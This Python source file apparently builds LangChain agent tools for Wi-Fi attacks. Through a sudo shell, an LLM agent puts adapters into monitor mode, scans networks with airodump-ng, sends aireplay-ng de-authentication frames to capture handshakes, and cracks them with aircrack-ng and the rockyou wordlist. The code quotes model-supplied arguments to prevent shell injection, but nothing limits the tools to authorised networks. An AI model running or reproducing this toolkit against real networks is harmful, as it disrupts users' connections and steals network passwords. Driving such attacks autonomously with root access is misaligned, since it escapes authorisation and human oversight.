import io
import json
import os
import random
import shlex
import subprocess
import tempfile
import threading
import zipfile
from time import time

import requests
from dotenv import load_dotenv
from langchain import hub
from langchain.agents import AgentExecutor, create_react_agent, load_tools
from langchain.tools import tool
from langchain_community.tools import ShellTool
from langchain_core.output_parsers import StrOutputParser
from langchain_core.prompts import PromptTemplate
from langchain_core.pydantic_v1 import BaseModel, Field, root_validator
from langchain_core.runnables import RunnablePassthrough
from langchain_openai import ChatOpenAI

# Single shared shell runner; every tool below builds a command string and
# hands it to this instance.
shell_tool = ShellTool()

# Wordlist handed to aircrack-ng.
# TODO: Abstract out wordlist - allow custom/multiple wordlist files as long
# as they sit in the directory.
WORDLIST_PATH = "wordlist/rockyou.txt"

# NOTE: the first argument of every @tool(...) call, every Field description
# and every tool-function docstring below is text the agent reads at runtime.
# They are intentionally left exactly as they were; explanatory notes for
# maintainers are written as `#` comments instead.


def _quote(value) -> str:
    """Return *value* as a single, safely shell-quoted token.

    Values arrive from LLM-generated JSON, so they may be non-strings (e.g. an
    integer channel) and may contain shell metacharacters.
    """
    return shlex.quote(str(value))


def _clean_params(params: str) -> str:
    """Normalise free-form command line parameters produced by the LLM.

    Strips the backticks and newlines the model tends to wrap around its
    answer, then re-quotes every token so that metacharacters such as ``;``,
    ``&&`` or ``$(...)`` reach the target program as literal arguments rather
    than being interpreted by the shell.
    """
    cleaned = params.replace("`", "").replace("\n", "")
    try:
        return shlex.join(shlex.split(cleaned))
    except ValueError:
        # Unbalanced quotes: fall back to passing the text as one literal token.
        return shlex.quote(cleaned)


def _parse_json_params(json_params: str) -> dict:
    """Decode the JSON object string the LLM passes to a tool.

    Backslashes are dropped first because the model frequently escapes the
    quotes of the JSON it emits, which would otherwise make decoding fail.

    Raises:
        json.JSONDecodeError: if the cleaned text is still not valid JSON.
    """
    return json.loads(json_params.replace("\\", ""))


# --- aircrack-ng tool --------------------------------------------------------


# Argument schema for the cracking tool: one string holding a JSON object.
class CrackPassword(BaseModel):
    json_params: str = Field(
        description=(
            "Should be a string of a json object containing "
            "'bssid': the bssid of the network to crack. "
            "'capfile': the path to the capture file containing the handshake. "
        )
    )


# Runs aircrack-ng against a captured handshake using WORDLIST_PATH and returns
# the raw command output straight to the user (return_direct=True).
# Raises KeyError if 'bssid' or 'capfile' is missing from the JSON object.
@tool(
    "Perform wifi encryption cracking with aircrack-ng",
    args_schema=CrackPassword,
    return_direct=True,
)
def wifi_encryption_cracking(json_params: str) -> str:
    """Must pass bssid and capfile parameters (as a string containing a json object) to aircrack-ng to perform wifi encryption cracking"""
    request = _parse_json_params(json_params)
    bssid = _quote(request["bssid"])
    capfile = _quote(request["capfile"])
    return shell_tool.run(
        {"commands": [f"aircrack-ng --bssid {bssid} -w {WORDLIST_PATH} {capfile}"]}
    )


# --- Deauth via combination of airodump-ng and aireplay-ng --------------------


# Argument schema for the de-auth tool: one string holding a JSON object.
class DeauthAndCapture(BaseModel):
    json_params: str = Field(
        description="Should be a string of a json object containing 'bssid', 'channel', client' and 'interface' for the network BSSID, wif channel, de-auth client target id, and the wireless interface respectively"
    )


# Starts a 15 second airodump-ng capture and, concurrently, an aireplay-ng
# de-auth burst against the client, then returns the path of the capture file
# airodump-ng is expected to have written.
# Raises KeyError if any of 'bssid', 'client', 'interface' or 'channel' is
# missing from the JSON object.
@tool(
    "Perform a de-auth and capture for a given wifi BSSID, channel, and client on the given wireless. All parameters must be identified first. Return the path to the handshake capture pcap file",
    args_schema=DeauthAndCapture,
    return_direct=False,
)
def deauth_and_capture(json_params: str) -> str:
    """Can pass bssid, client, channel, and interface parameters to aireplay-ng to perform and capture a de-auth. All parameters must be identified first"""
    request = _parse_json_params(json_params)
    bssid = _quote(request["bssid"])
    client = _quote(request["client"])
    interface = _quote(request["interface"])
    channel = _quote(request["channel"])

    # Random suffix so repeated runs do not overwrite each other's dumps.
    capture_id = random.getrandbits(16)
    out = f"dumps/deauth-capture-{capture_id}"

    capture_cmd = (
        "sudo timeout -s SIGKILL 15 airodump-ng --band a "
        f"--channel {channel} --bssid {bssid} --write {out} {interface}"
    )
    deauth_cmd = f"sudo aireplay-ng --deauth 10 -a {bssid} -c {client} {interface}"

    # The capture has to be running while the de-auth frames are sent, so the
    # two commands run in parallel rather than one after the other.
    workers = [
        threading.Thread(target=shell_tool.run, args=({"commands": [capture_cmd]},)),
        threading.Thread(target=shell_tool.run, args=({"commands": [deauth_cmd]},)),
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()

    # airodump-ng appends "-01.cap" to the --write prefix of the first capture.
    return f"{out}-01.cap"  # return path to the handshake capture file


# --- aireplay-ng packet transmission tool (disabled) --------------------------

# class PacketTransmission(BaseModel):
#     params: str = Field(
#         description="Should be command line parameters to 'aireplay-ng' to perform some kind of wifi frame or packet transmission"
#     )
#
#
# @tool(
#     "Perform packet or wifi frame transmission with aireplay-ng",
#     args_schema=PacketTransmission,
#     return_direct=False,
# )
# def packet_frame_transmission(params: str) -> str:
#     """Can pass parameters to aireplay-ng to perform packet or wifi frame transmission"""
#     params = params.replace("`", "").replace("\n", "")  # fix buggy input from LLM
#     res = shell_tool.run({"commands": [f"sudo aireplay-ng {params}"]})
#     return res


# --- airodump-ng reconnaissance tool -----------------------------------------


# Argument schema for the reconnaissance tool.
class PacketCapture(BaseModel):
    params: str = Field(
        description="Should be the interface name on which to perform reconnaissance, followed by any optional command line flag parameters"
    )


# Runs airodump-ng for 30 seconds writing a CSV dump, then returns the CSV text.
# If the dump cannot be read, a hint string is returned instead of raising.
@tool(
    "Perform wifi reconnaissance with airodump-ng. Interface must be in monitor mode before starting",
    args_schema=PacketCapture,
    return_direct=False,
)
def reconnaissance(params: str) -> str:
    """Use airodump-ng to gather wireless network information. Must take the interface as a parameter and may optionally be followed by command like flag parameters"""
    params = _clean_params(params)  # fix buggy input from LLM
    dump_id = random.getrandbits(16)

    # band a for 5Ghz - TODO: make it smart enough to figure out the band you
    # want, or perhaps to ask.
    shell_tool.run(
        {
            "commands": [
                f"sudo timeout -s SIGKILL 30 airodump-ng --band a --output-format csv --write dumps/dump-{dump_id} {params} "
            ]
        }
    )

    try:
        with open(f"dumps/dump-{dump_id}-01.csv", "r") as dump_file:
            return dump_file.read()
    except (OSError, UnicodeDecodeError):
        # Missing or unreadable dump: report it to the agent instead of raising.
        return "The file does not exist. Ensure interface is in monitor mode before using this tool"


# --- iw scan tool (disabled) --------------------------------------------------

# class IwScan(BaseModel):
#     interface: str = Field(
#         description="Should be a wireless interface name, used as a paramater to 'iw' to scan for wifi networks"
#     )
#     network: str = Field(
#         description="Should be the name or SSID of the wifi network you are interested in"
#     )
#
#
# @tool(
#     "Perform wifi scanning with iw. Requires the adapter be in managed mode. Adepter should be put into managed mode before running this if necessary and the interface name should be that of the managed mode interface",
#     args_schema=IwScan,
#     return_direct=False,
# )
# def wifi_network_reconnissance(interface: str) -> str:
#     """Can pass a wireless interface name and wifi network name to return technical information about a wifi network"""
#     interface = interface.replace("`", "").replace("\n", "")  # fix buggy input from LLM
#     res = shell_tool.run(
#         {
#             "commands": [
#                 f"sudo ifconfig {interface} up",
#                 "sleep 5",
#                 f'sudo iw {interface} scan | grep -B 9 -A 206 "NetSec"',
#             ]
#         }
#     )  # TODO: fix error when passing network param
#     return res


# --- airmon-ng tool -----------------------------------------------------------


# Argument schema for the airmon-ng tool.
class ChangeMonitorMode(BaseModel):
    params: str = Field(
        description="Should be command line parameters to 'airmon-ng' to change the state of a given wireless iterface mode."
    )


# Runs `sudo airmon-ng <params>` followed by a 5 second sleep and returns the
# combined shell output.
@tool(
    "Change the state of the wireless adapter mode with airmon-ng",
    args_schema=ChangeMonitorMode,
    return_direct=False,
)
def change_adapter_mode(params: str) -> str:
    """Can pass parameters to airmon-ng to change the mode of the wireless adapter"""
    params = _clean_params(params)  # fix buggy input from LLM
    return shell_tool.run({"commands": [f"sudo airmon-ng {params}", "sleep 5s"]})


# --- iwconfig tool ------------------------------------------------------------


# Argument schema for the iwconfig tool.
class Iwconfig(BaseModel):
    params: str = Field(
        description="should be command line parameters to 'iwconfig'. If none are needed, this should be left as an empty string"
    )


# Runs `iwconfig <params>` and returns its output; the cleaned parameters are
# echoed to stdout first.
@tool("Get interface information", args_schema=Iwconfig, return_direct=False)
def get_wireless_interface(params: str) -> str:
    """Return wireless interface information via iwconfig"""
    params = _clean_params(params)  # fix buggy input from LLM
    print("params ", params)
    return shell_tool.run({"commands": [f"iwconfig {params}"]})